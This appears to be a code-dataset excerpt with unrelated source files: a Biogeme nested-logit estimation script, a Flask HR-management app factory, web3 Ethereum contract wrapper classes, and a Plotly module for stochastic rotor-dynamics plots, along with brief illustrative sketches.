p730_p1000_other*p_730p_1000p+\ p1000_a700_other*p_1000p_700a #V for quit V_quit= cons_Q+first_stop_inbound*first_stop*first_bound+\ second_stop_inbound*second_stop*first_bound+\ threeplus_stop_inbound*three_plus_stop*first_bound+\ first_stop_outbound*first_stop*second_bound+\ second_stop_outbound*second_stop*second_bound+\ threeplus_stop_outbound*three_plus_stop*second_bound+\ work_tour_dummy_Q*1*(tour_type==1)+\ edu_tour_dummy_Q*1*(tour_type==2)+\ shopping_tour_dummy_Q*1*(tour_type==3)+\ other_tour_dummy_Q*1*(tour_type==4)+\ first_tour_dummy_Q*first_tour_dummy+\ sub_tour_dummy_Q*has_subtour+zero_tour_remain_Q*1*(tour_remain==0)+\ one_tour_remain_Q*1*(tour_remain==1)+twoplus_tour_remain_Q*1*(tour_remain>=2) V = {0:V_quit,1: V_work,2:V_edu,3:V_shopping,4:V_other} av= {0:avail_quit,1:avail_workstop,2:avail_edustop,3:avail_shopstop,4:avail_otherstop} nest_quit = MU1 , [0] nest_nonquit = MU2 , [1,2,3,4] nests=nest_quit,nest_nonquit prob = nested(V,av,nests,stop_type) #prob = bioLogit(V,av,stop_type) rowIterator('obsIter') BIOGEME_OBJECT.ESTIMATE = Sum(log(prob),'obsIter') exclude = ((avail_violation==1)+(origin_mtz==0)+(destination_mtz==0)+(time_window_h>=10)) > 0 BIOGEME_OBJECT.EXCLUDE = exclude nullLoglikelihood(av,'obsIter') choiceSet = [0,1,2,3,4] cteLoglikelihood(choiceSet,stop_type,'obsIter') availabilityStatistics(av,'obsIter') BIOGEME_OBJECT.PARAMETERS['optimizationAlgorithm'] = "CFSQP" BIOGEME_OBJECT.PARAMETERS['checkDerivatives'] = "1" BIOGEME_OBJECT.PARAMETERS['numberOfThreads'] = "6"
[]
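The script above hands nested() a two-level structure: a degenerate nest holding only the quit alternative (scale MU1) and a non-quit nest holding the four stop purposes (scale MU2). For readers who want to see what that structure computes, the following self-contained NumPy sketch evaluates standard nested-logit probabilities for the same layout; the function name and all utility values are invented for illustration and are not part of the repository.

# Plain-NumPy illustration of the two-nest logit structure used above (hypothetical values).
import numpy as np

def nested_logit_probs(V, nests):
    """V: dict alt -> utility; nests: list of (mu, [alts]); returns dict alt -> probability."""
    within, logsums = {}, []
    for mu, alts in nests:
        ev = {a: np.exp(mu * V[a]) for a in alts}
        denom = sum(ev.values())
        for a in alts:
            within[a] = ev[a] / denom                 # P(alternative | nest)
        logsums.append(np.log(denom) / mu)             # nest inclusive value (logsum)
    nest_p = np.exp(logsums) / np.sum(np.exp(logsums))  # P(nest), top-level scale fixed to 1
    return {a: within[a] * nest_p[k] for k, (_, alts) in enumerate(nests) for a in alts}

V_demo = {0: 0.0, 1: 1.2, 2: 0.4, 3: -0.3, 4: 0.1}        # hypothetical utilities
print(nested_logit_probs(V_demo, [(1.0, [0]), (2.0, [1, 2, 3, 4])]))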
freestyletime/HumanResourceManagement
HRMS/app/__init__.py
4ec7f453fdae28d1a412d740849c9ee186757df8
# Package initialization module from config import Config from flask import Flask from flask_sqlalchemy import SQLAlchemy # Database access object db = SQLAlchemy() # Create the application def create_app(): # Flask application object app = Flask(__name__) # Load and apply settings from the config file app.config.from_object(Config) # Initialize the database db.init_app(app) # Employee management subsystem from app.view import employee # Post (position) management subsystem from app.view import post # Department management subsystem from app.view import department # Salary management subsystem from app.view import salary # Attendance management subsystem from app.view import attendance # Register the blueprints as the unified external interface app.register_blueprint(employee) app.register_blueprint(post) app.register_blueprint(department) app.register_blueprint(salary) app.register_blueprint(attendance) return app
[((114, 126), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', ([], {}), '()\n', (124, 126), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((181, 196), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (186, 196), False, 'from flask import Flask\n')]
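The HRMS package above follows the usual Flask application-factory pattern: create_app() builds the app, applies Config, binds the shared SQLAlchemy instance, and registers one blueprint per subsystem. A minimal, hypothetical launcher for that factory is sketched below; the file name, the create_all() step, and the debug flag are assumptions, not part of the repository.

# run.py (hypothetical) -- launches the factory defined in app/__init__.py above.
from app import create_app, db

app = create_app()

if __name__ == "__main__":
    with app.app_context():
        db.create_all()       # assumes the model classes are imported when the factory runs
    app.run(debug=True)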
NicolasMenendez/oracles-dashboard
listener/src/ethereum_connection.py
789e4a771c9f7064a19a85ef1b4f44bcbbac1a10
import json import web3 class EthereumConnection(): def __init__(self, url_node): self._url_node = url_node self._node_provider = web3.HTTPProvider(self._url_node) self._w3 = web3.Web3(self._node_provider) @property def w3(self): return self._w3 @property def url_node(self): return self._url_node class ContractConnection(): def __init__(self, eth_conn, contract_address, abi_path): self._eth_conn = eth_conn self._contract_address = self._eth_conn.w3.toChecksumAddress(contract_address) self._abi_path = abi_path self.__json_abi = self.__open_abi() self._contract = self._eth_conn.w3.eth.contract( address=self._contract_address, abi=self.__json_abi ) def __open_abi(self): return json.load(open(self._abi_path, "r")) @property def abi(self): return self.__json_abi @property def contract(self): return self._contract @property def address(self): return self._contract_address @property def eth(self): return self._contract.web3.eth @property def w3(self): return self._eth_conn.w3
[((152, 185), 'web3.HTTPProvider', 'web3.HTTPProvider', (['self._url_node'], {}), '(self._url_node)\n', (169, 185), False, 'import web3\n'), ((205, 235), 'web3.Web3', 'web3.Web3', (['self._node_provider'], {}), '(self._node_provider)\n', (214, 235), False, 'import web3\n')]
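A short, hypothetical usage sketch for the two wrapper classes above; the node URL, contract address, and ABI path are placeholders rather than repository values, and on-chain calls are only hinted at in a comment.

# Hypothetical wiring of the listener's connection wrappers (placeholder values only).
from ethereum_connection import EthereumConnection, ContractConnection

eth_conn = EthereumConnection("http://localhost:8545")       # placeholder node URL
oracle = ContractConnection(
    eth_conn,
    "0x0000000000000000000000000000000000000000",          # placeholder address
    "abi/oracle.json",                                     # placeholder ABI path
)

print(oracle.address)    # checksummed by the wrapper via w3.toChecksumAddress
# Contract calls then go through the exposed web3 contract object, e.g.
# oracle.contract.functions.someFunction().call()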
JuliaMota/ross
ross/stochastic/st_results.py
88c2fa69d9a583dcdc33eab8deb35c797ebf4ef8
"""STOCHASTIC ROSS plotting module. This module returns graphs for each type of analyses in st_rotor_assembly.py. """ import numpy as np from plotly import express as px from plotly import graph_objects as go from plotly import io as pio from plotly.subplots import make_subplots from ross.plotly_theme import tableau_colors pio.renderers.default = "browser" # set Plotly palette of colors colors1 = px.colors.qualitative.Dark24 colors2 = px.colors.qualitative.Light24 class ST_CampbellResults: """Store stochastic results and provide plots for Campbell Diagram. It's possible to visualize multiples harmonics in a single plot to check other speeds which also excite a specific natural frequency. Two options for plooting are available: Matplotlib and Bokeh. The user chooses between them using the attribute plot_type. The default is bokeh Parameters ---------- speed_range : array Array with the speed range in rad/s. wd : array Array with the damped natural frequencies log_dec : array Array with the Logarithmic decrement Returns ------- subplots : Plotly graph_objects.make_subplots() Plotly figure with diagrams for frequency and log dec. """ def __init__(self, speed_range, wd, log_dec): self.speed_range = speed_range self.wd = wd self.log_dec = log_dec def plot_nat_freq(self, percentile=[], conf_interval=[], harmonics=[1], **kwargs): """Plot the damped natural frequencies vs frequency. Parameters ---------- percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. harmonics: list, optional List withe the harmonics to be plotted. The default is to plot 1x. kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. 
""" default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) for k, v in default_values.items(): kwargs.setdefault(k, v) fig = go.Figure() x = np.concatenate((self.speed_range, self.speed_range[::-1])) for j, h in enumerate(harmonics): fig.add_trace( go.Scatter( x=self.speed_range, y=self.speed_range * h, opacity=1.0, name="{}x speed".format(h), line=dict(width=3, color=colors1[j], dash="dashdot"), legendgroup="speed{}".format(j), hovertemplate=("Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}"), **kwargs, ) ) for j in range(self.wd.shape[0]): fig.add_trace( go.Scatter( x=self.speed_range, y=np.mean(self.wd[j], axis=1), opacity=1.0, name="Mean - Mode {}".format(j + 1), line=dict(width=3, color=colors1[j]), legendgroup="mean{}".format(j), hovertemplate=("Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}"), **kwargs, ) ) for i, p in enumerate(percentile): fig.add_trace( go.Scatter( x=self.speed_range, y=np.percentile(self.wd[j], p, axis=1), opacity=0.6, line=dict(width=2.5, color=colors2[j]), name="percentile: {}%".format(p), legendgroup="percentile{}{}".format(j, i), hovertemplate=( "Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}" ), **kwargs, ) ) for i, p in enumerate(conf_interval): p1 = np.percentile(self.wd[j], 50 + p / 2, axis=1) p2 = np.percentile(self.wd[j], 50 - p / 2, axis=1) fig.add_trace( go.Scatter( x=x, y=np.concatenate((p1, p2[::-1])), line=dict(width=1, color=colors1[j]), fill="toself", fillcolor=colors1[j], opacity=0.3, name="confidence interval: {}% - Mode {}".format(p, j + 1), legendgroup="conf{}{}".format(j, i), hovertemplate=( "Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}" ), **kwargs, ) ) fig.update_xaxes( title_text="<b>Rotor speed</b>", title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_yaxes( title_text="<b>Damped Natural Frequencies</b>", title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_layout( width=1200, height=900, plot_bgcolor="white", legend=dict( font=dict(family="sans-serif", size=14), bgcolor="white", bordercolor="black", borderwidth=2, ), ) return fig def plot_log_dec(self, percentile=[], conf_interval=[], harmonics=[1], **kwargs): """Plot the log_dec vs frequency. Parameters ---------- percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. harmonics: list, optional List withe the harmonics to be plotted. The default is to plot 1x. kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. 
""" default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) for k, v in default_values.items(): kwargs.setdefault(k, v) fig = go.Figure() x = np.concatenate((self.speed_range, self.speed_range[::-1])) for j in range(self.log_dec.shape[0]): fig.add_trace( go.Scatter( x=self.speed_range, y=np.mean(self.log_dec[j], axis=1), opacity=1.0, name="Mean - Mode {}".format(j + 1), line=dict(width=3, color=colors1[j]), legendgroup="mean{}".format(j), hovertemplate=("Frequency: %{x:.3f}<br>" + "Log Dec: %{y:.3f}"), **kwargs, ) ) for i, p in enumerate(percentile): fig.add_trace( go.Scatter( x=self.speed_range, y=np.percentile(self.log_dec[j], p, axis=1), opacity=0.6, line=dict(width=2.5, color=colors2[j]), name="percentile: {}%".format(p), legendgroup="percentile{}{}".format(j, i), hoverinfo="none", **kwargs, ) ) for i, p in enumerate(conf_interval): p1 = np.percentile(self.log_dec[j], 50 + p / 2, axis=1) p2 = np.percentile(self.log_dec[j], 50 - p / 2, axis=1) fig.add_trace( go.Scatter( x=x, y=np.concatenate((p1, p2[::-1])), line=dict(width=1, color=colors1[j]), fill="toself", fillcolor=colors1[j], opacity=0.3, name="confidence interval: {}% - Mode {}".format(p, j + 1), legendgroup="conf{}{}".format(j, i), hoverinfo="none", **kwargs, ) ) fig.update_xaxes( title_text="<b>Rotor speed</b>", title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_yaxes( title_text="<b>Logarithmic decrement</b>", title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_layout( plot_bgcolor="white", width=1200, height=900, legend=dict( font=dict(family="sans-serif", size=14), bgcolor="white", bordercolor="black", borderwidth=2, ), ) return fig def plot(self, percentile=[], conf_interval=[], *args, **kwargs): """Plot Campbell Diagram. This method plots Campbell Diagram. Parameters ---------- percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. args: optional harmonics : list, optional List with the harmonics to be plotted. The default is to plot 1x. kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- subplots : Plotly graph_objects.make_subplots() Plotly figure with diagrams for frequency and log dec. 
""" fig0 = self.plot_nat_freq(percentile, conf_interval, *args, **kwargs) default_values = dict(showlegend=False) for k, v in default_values.items(): kwargs.setdefault(k, v) fig1 = self.plot_log_dec(percentile, conf_interval, *args, **kwargs) subplots = make_subplots(rows=1, cols=2) for data in fig0["data"]: subplots.add_trace(data, 1, 1) for data in fig1["data"]: subplots.add_trace(data, 1, 2) subplots.update_xaxes(fig0.layout.xaxis, row=1, col=1) subplots.update_yaxes(fig1.layout.yaxis, row=1, col=1) subplots.update_xaxes(fig0.layout.xaxis, row=1, col=2) subplots.update_yaxes(fig1.layout.yaxis, row=1, col=2) subplots.update_layout( plot_bgcolor="white", width=1800, height=900, legend=dict( font=dict(family="sans-serif", size=14), bgcolor="white", bordercolor="black", borderwidth=2, ), ) return subplots class ST_FrequencyResponseResults: """Store stochastic results and provide plots for Frequency Response. Parameters ---------- speed_range : array Array with the speed range in rad/s. magnitude : array Array with the frequencies, magnitude (dB) of the frequency response for each pair input/output. phase : array Array with the frequencies, phase of the frequency response for each pair input/output. Returns ------- subplots : Plotly graph_objects.make_subplots() Plotly figure with amplitude vs frequency phase angle vs frequency. """ def __init__(self, speed_range, magnitude, phase): self.speed_range = speed_range self.magnitude = magnitude self.phase = phase def plot_magnitude( self, percentile=[], conf_interval=[], units="mic-pk-pk", **kwargs, ): """Plot amplitude vs frequency. This method plots the frequency response magnitude given an output and an input using Plotly. Parameters ---------- percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0% and 100% inclusive. units : str, optional Unit system Default is "mic-pk-pk". kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. 
""" if units == "m": y_axis_label = "<b>Amplitude (m)</b>" elif units == "mic-pk-pk": y_axis_label = "<b>Amplitude (μ pk-pk)</b>" else: y_axis_label = "<b>Amplitude (dB)</b>" default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) for k, v in default_values.items(): kwargs.setdefault(k, v) fig = go.Figure() fig.add_trace( go.Scatter( x=self.speed_range, y=np.mean(self.magnitude, axis=1), opacity=1.0, name="Mean", line=dict(width=3, color="black"), legendgroup="mean", hovertemplate=("Frequency: %{x:.2f}<br>" + "Amplitude: %{y:.2e}"), **kwargs, ) ) for i, p in enumerate(percentile): fig.add_trace( go.Scatter( x=self.speed_range, y=np.percentile(self.magnitude, p, axis=1), opacity=0.6, line=dict(width=2.5, color=colors2[i]), name="percentile: {}%".format(p), legendgroup="percentile{}".format(i), hovertemplate=("Frequency: %{x:.2f}<br>" + "Amplitude: %{y:.2e}"), **kwargs, ) ) x = np.concatenate((self.speed_range, self.speed_range[::-1])) for i, p in enumerate(conf_interval): p1 = np.percentile(self.magnitude, 50 + p / 2, axis=1) p2 = np.percentile(self.magnitude, 50 - p / 2, axis=1) fig.add_trace( go.Scatter( x=x, y=np.concatenate((p1, p2[::-1])), line=dict(width=1, color=colors1[i]), fill="toself", fillcolor=colors1[i], opacity=0.5, name="confidence interval: {}%".format(p), legendgroup="conf{}".format(i), hovertemplate=("Frequency: %{x:.2f}<br>" + "Amplitude: %{y:.2e}"), **kwargs, ) ) fig.update_xaxes( title_text="<b>Frequency</b>", title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_yaxes( title_text=y_axis_label, title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_layout( plot_bgcolor="white", width=1200, height=900, legend=dict( font=dict(family="sans-serif", size=14), bgcolor="white", bordercolor="black", borderwidth=2, ), ) return fig def plot_phase(self, percentile=[], conf_interval=[], **kwargs): """Plot phase angle response. This method plots the phase response given an output and an input using bokeh. Parameters ---------- percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. 
""" default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) for k, v in default_values.items(): kwargs.setdefault(k, v) fig = go.Figure() fig.add_trace( go.Scatter( x=self.speed_range, y=np.mean(self.phase, axis=1), opacity=1.0, name="Mean", line=dict(width=3, color="black"), legendgroup="mean", hovertemplate=("Frequency: %{x:.2f}<br>" + "Phase: %{y:.2f}"), **kwargs, ) ) for i, p in enumerate(percentile): fig.add_trace( go.Scatter( x=self.speed_range, y=np.percentile(self.phase, p, axis=1), opacity=0.6, line=dict(width=2.5, color=colors2[i]), name="percentile: {}%".format(p), legendgroup="percentile{}".format(i), hovertemplate=("Frequency: %{x:.2f}<br>" + "Phase: %{y:.2f}"), **kwargs, ) ) x = np.concatenate((self.speed_range, self.speed_range[::-1])) for i, p in enumerate(conf_interval): p1 = np.percentile(self.phase, 50 + p / 2, axis=1) p2 = np.percentile(self.phase, 50 - p / 2, axis=1) fig.add_trace( go.Scatter( x=x, y=np.concatenate((p1, p2[::-1])), line=dict(width=1, color=colors1[i]), fill="toself", fillcolor=colors1[i], opacity=0.5, name="confidence interval: {}%".format(p), legendgroup="conf{}".format(i), hovertemplate=("Frequency: %{x:.2f}<br>" + "Phase: %{y:.2f}"), **kwargs, ) ) fig.update_xaxes( title_text="<b>Frequency</b>", title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_yaxes( title_text="<b>Phase Angle</b>", title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_layout( plot_bgcolor="white", width=1200, height=900, legend=dict( font=dict(family="sans-serif", size=14), bgcolor="white", bordercolor="black", borderwidth=2, ), ) return fig def plot_polar_bode( self, percentile=[], conf_interval=[], units="mic-pk-pk", **kwargs, ): """Plot polar forced response using Plotly. Parameters ---------- dof : int Degree of freedom. units : str Magnitude unit system. Default is "mic-pk-pk" polar_kwargs : optional Additional key word arguments can be passed to change the plot layout only (e.g. width=1000, height=800, ...). *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. 
""" default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) if units == "m": r_axis_label = "<b>Amplitude (m)</b>" elif units == "mic-pk-pk": r_axis_label = "<b>Amplitude (μ pk-pk)</b>" else: r_axis_label = "<b>Amplitude (dB)</b>" for k, v in default_values.items(): kwargs.setdefault(k, v) fig = go.Figure() fig.add_trace( go.Scatterpolar( r=np.mean(self.magnitude, axis=1), theta=np.mean(self.phase, axis=1), customdata=self.speed_range, thetaunit="radians", line=dict(width=3.0, color="black"), name="Mean", legendgroup="mean", hovertemplate=( "<b>Amplitude: %{r:.2e}</b><br>" + "<b>Phase: %{theta:.2f}</b><br>" + "<b>Frequency: %{customdata:.2f}</b>" ), **kwargs, ) ) for i, p in enumerate(percentile): fig.add_trace( go.Scatterpolar( r=np.percentile(self.magnitude, p, axis=1), theta=np.percentile(self.phase, p, axis=1), customdata=self.speed_range, thetaunit="radians", opacity=0.6, line=dict(width=2.5, color=colors2[i]), name="percentile: {}%".format(p), legendgroup="percentile{}".format(i), hovertemplate=( "<b>Amplitude: %{r:.2e}</b><br>" + "<b>Phase: %{theta:.2f}</b><br>" + "<b>Frequency: %{customdata:.2f}</b>" ), **kwargs, ) ) for i, p in enumerate(conf_interval): p1 = np.percentile(self.magnitude, 50 + p / 2, axis=1) p2 = np.percentile(self.magnitude, 50 - p / 2, axis=1) p3 = np.percentile(self.phase, 50 + p / 2, axis=1) p4 = np.percentile(self.phase, 50 - p / 2, axis=1) fig.add_trace( go.Scatterpolar( r=np.concatenate((p1, p2[::-1])), theta=np.concatenate((p3, p4[::-1])), thetaunit="radians", line=dict(width=1, color=colors1[i]), fill="toself", fillcolor=colors1[i], opacity=0.5, name="confidence interval: {}%".format(p), legendgroup="conf{}".format(i), **kwargs, ) ) fig.update_layout( polar=dict( radialaxis=dict( title_text=r_axis_label, title_font=dict(family="Arial", size=14), gridcolor="lightgray", exponentformat="power", ), angularaxis=dict( tickfont=dict(size=14), gridcolor="lightgray", linecolor="black", linewidth=2.5, ), ), ) return fig def plot(self, percentile=[], conf_interval=[], units="mic-pk-pk", **kwargs): """Plot frequency response. This method plots the frequency and phase response given an output and an input. Parameters ---------- percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. units : str, optional Unit system Default is "mic-pk-pk" kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- subplots : Plotly graph_objects.make_subplots() Plotly figure with amplitude vs frequency phase angle vs frequency. 
""" fig0 = self.plot_magnitude(percentile, conf_interval, units, **kwargs) default_values = dict(showlegend=False) for k, v in default_values.items(): kwargs.setdefault(k, v) fig1 = self.plot_phase(percentile, conf_interval, **kwargs) fig2 = self.plot_polar_bode(percentile, conf_interval, units, **kwargs) subplots = make_subplots( rows=2, cols=2, specs=[[{}, {"type": "polar", "rowspan": 2}], [{}, None]] ) for data in fig0["data"]: subplots.add_trace(data, row=1, col=1) for data in fig1["data"]: subplots.add_trace(data, row=2, col=1) for data in fig2["data"]: subplots.add_trace(data, row=1, col=2) subplots.update_xaxes(fig0.layout.xaxis, row=1, col=1) subplots.update_yaxes(fig0.layout.yaxis, row=1, col=1) subplots.update_xaxes(fig1.layout.xaxis, row=2, col=1) subplots.update_yaxes(fig1.layout.yaxis, row=2, col=1) subplots.update_layout( plot_bgcolor="white", polar_bgcolor="white", width=1800, height=900, polar=dict( radialaxis=fig2.layout.polar.radialaxis, angularaxis=fig2.layout.polar.angularaxis, ), legend=dict( font=dict(family="sans-serif", size=14), bgcolor="white", bordercolor="black", borderwidth=2, ), ) return subplots class ST_TimeResponseResults: """Store stochastic results and provide plots for Time Response and Orbit Response. Parameters ---------- time_range : 1-dimensional array Time array. yout : array System response. xout : array Time evolution of the state vector. nodes_list: array list with nodes from a rotor model. nodes_pos: array Rotor nodes axial positions. number_dof : int Number of degrees of freedom per shaft element's node Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. """ def __init__(self, time_range, yout, xout, number_dof, nodes_list, nodes_pos): self.time_range = time_range self.yout = yout self.xout = xout self.nodes_list = nodes_list self.nodes_pos = nodes_pos self.number_dof = number_dof def plot_1d( self, probe, percentile=[], conf_interval=[], fig=None, *args, **kwargs ): """Plot time response. This method plots the time response given a tuple of probes with their nodes and orientations. Parameters ---------- probe : list of tuples List with tuples (node, orientation angle). node : int indicate the node where the probe is located. orientation : float, probe orientation angle about the shaft. The 0 refers to +X direction. percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. fig : Plotly graph_objects.Figure() The figure object with the plot. args : optional Additional plot axes kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. 
""" if fig is None: fig = go.Figure() default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) for k, v in default_values.items(): kwargs.setdefault(k, v) for i, p in enumerate(probe): dofx = p[0] * self.number_dof dofy = p[0] * self.number_dof + 1 angle = p[1] # fmt: off operator = np.array( [[np.cos(angle), - np.sin(angle)], [np.cos(angle), + np.sin(angle)]] ) probe_resp = np.zeros_like(self.yout[:, :, 0]) for j, y in enumerate(self.yout): _probe_resp = operator @ np.vstack((y[:, dofx], y[:, dofy])) probe_resp[j] = ( _probe_resp[0] * np.cos(angle) ** 2 + _probe_resp[1] * np.sin(angle) ** 2 ) # fmt: on fig.add_trace( go.Scatter( x=self.time_range, y=np.mean(probe_resp, axis=0), opacity=1.0, name=f"Probe {i + 1} - Mean", line=dict(width=3.0), hovertemplate=("Time: %{x:.3f}<br>" + "Amplitude: %{y:.2e}"), **kwargs, ) ) for j, p in enumerate(percentile): fig.add_trace( go.Scatter( x=self.time_range, y=np.percentile(probe_resp, p, axis=0), opacity=0.6, line=dict(width=2.5), name=f"Probe {i + 1} - percentile: {p}%", hovertemplate=("Time: %{x:.3f}<br>" + "Amplitude: %{y:.2e}"), **kwargs, ) ) x = np.concatenate((self.time_range, self.time_range[::-1])) for j, p in enumerate(conf_interval): p1 = np.percentile(probe_resp, 50 + p / 2, axis=0) p2 = np.percentile(probe_resp, 50 - p / 2, axis=0) fig.add_trace( go.Scatter( x=x, y=np.concatenate((p1, p2[::-1])), line=dict(width=1), fill="toself", fillcolor=colors1[j], opacity=0.5, name=f"Probe {i + 1} - confidence interval: {p}%", hovertemplate=("Time: %{x:.3f}<br>" + "Amplitude: %{y:.2e}"), **kwargs, ) ) fig.update_xaxes(title_text="<b>Time (s)</b>") fig.update_yaxes(title_text="<b>Amplitude</b>") return fig def plot_2d(self, node, percentile=[], conf_interval=[], fig=None, *args, **kwargs): """Plot orbit response (2D). This function plots orbits for a given node on the rotor system in a 2D view. Parameters ---------- node : int Select the node to display the respective orbit response. percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. fig : Plotly graph_objects.Figure() The figure object with the plot. args : optional Additional plot axes kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. 
""" ndof = self.number_dof default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) for k, v in default_values.items(): kwargs.setdefault(k, v) if fig is None: fig = go.Figure() fig.add_trace( go.Scatter( x=np.mean(self.yout[..., ndof * node], axis=0), y=np.mean(self.yout[..., ndof * node + 1], axis=0), opacity=1.0, name="Mean", line=dict(width=3, color="black"), hovertemplate=( "X - Amplitude: %{x:.2e}<br>" + "Y - Amplitude: %{y:.2e}" ), **kwargs, ) ) for i, p in enumerate(percentile): fig.add_trace( go.Scatter( x=np.percentile(self.yout[..., ndof * node], p, axis=0), y=np.percentile(self.yout[..., ndof * node + 1], p, axis=0), opacity=0.6, line=dict(width=2.5, color=colors2[i]), name="percentile: {}%".format(p), hovertemplate=( "X - Amplitude: %{x:.2e}<br>" + "Y - Amplitude: %{y:.2e}" ), **kwargs, ) ) for i, p in enumerate(conf_interval): p1 = np.percentile(self.yout[..., ndof * node], 50 + p / 2, axis=0) p2 = np.percentile(self.yout[..., ndof * node], 50 - p / 2, axis=0) p3 = np.percentile(self.yout[..., ndof * node + 1], 50 + p / 2, axis=0) p4 = np.percentile(self.yout[..., ndof * node + 1], 50 - p / 2, axis=0) fig.add_trace( go.Scatter( x=np.concatenate((p1, p2[::-1])), y=np.concatenate((p3, p4[::-1])), line=dict(width=1, color=colors1[i]), fill="toself", fillcolor=colors1[i], opacity=0.5, name="confidence interval: {}%".format(p), hovertemplate=( "X - Amplitude: %{x:.2e}<br>" + "Y - Amplitude: %{y:.2e}" ), **kwargs, ) ) fig.update_xaxes(title_text="<b>Amplitude</b>") fig.update_yaxes(title_text="<b>Amplitude</b>") fig.update_layout(title="<b>Rotor Orbit: node {}</b>".format(node)), return fig def plot_3d(self, percentile=[], conf_interval=[], fig=None, *args, **kwargs): """Plot orbit response (3D). This function plots orbits for each node on the rotor system in a 3D view. Parameters ---------- percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. fig : Plotly graph_objects.Figure() The figure object with the plot. args : optional Additional plot axes kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. 
